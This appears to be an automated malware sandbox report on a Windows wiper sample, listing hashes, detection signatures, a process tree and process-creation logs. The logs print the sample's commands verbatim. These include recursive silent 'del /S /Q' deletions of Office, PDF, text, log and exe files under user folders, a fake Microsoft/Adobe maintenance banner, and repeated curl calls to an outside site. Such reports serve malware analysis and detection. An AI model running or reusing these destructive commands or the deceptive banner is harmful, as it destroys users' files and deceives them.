Windows Analysis Report Z0hOr2pD7k

Overview

General Information

Sample Name: Z0hOr2pD7k (renamed file extension from none to exe)
Analysis ID: 452577
MD5: 8edf0aa789d976df0c80fd8d62734ded
SHA1: 54a8b718fda1ea749df17271d3f897c947004483
SHA256: fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
Tags: exe upx wiper
Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect virtual machines (IN, VMware)
Deletes itself after installation
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Uses 32bit PE files
Yara signature match

Process Tree

  • System is w10x64
  • Z0hOr2pD7k.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\Z0hOr2pD7k.exe' MD5: 8EDF0AA789D976DF0C80FD8D62734DED)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6608 cmdline: C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6632 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6664 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7076 cmdline: C:\Windows\system32\cmd.exe /c echo Wait a minute... MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c @echo OFF MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7100 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6136 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3148 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3560 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 772 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5252 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 492 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6228 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1000 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6312 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6160 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6820 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6892 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4664 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1296 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5748 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6504 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 796 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4420 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2016 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7124 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2812 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4944 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5352 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Z0hOr2pD7k.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Z0hOr2pD7k.exe Virustotal: Detection: 55%
Source: Z0hOr2pD7k.exe Metadefender: Detection: 20%
Source: Z0hOr2pD7k.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: Z0hOr2pD7k.exe Joe Sandbox ML: detected
Source: 0.0.Z0hOr2pD7k.exe.9c0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2
Source: Z0hOr2pD7k.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Z0hOr2pD7k.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp String found in binary or memory: https://www.xvideos.com
Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmp String found in binary or memory: https://www.xvideos.com/video64080443/_
Source: cmd.exe Process created: 123
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C14A0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C15A0
Source: 0.2.Z0hOr2pD7k.exe.9c0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: classification engine Classification label: mal76.spyw.evad.winEXE@128/22@0/0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Code function: 0_2_009C10D0 72A73930,CreateToolhelp32Snapshot,Process32First,Process32First,76A06610,76A06610,Process32Next,76A06610,GetClassNameA,76A06610,76A06610
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Z0hOr2pD7k.exe 'C:\Users\user\Desktop\Z0hOr2pD7k.exe'
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF
Note: the echo lines only paint a fake maintenance banner (Microsoft and Adobe copyright strings, "DO NOT STOP THE PROCESS") in the sample's console window while the del commands below run; the sample is launched from C:\Windows\system32 but lands in SysWOW64 because it is a 32-bit process subject to file system redirection.
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
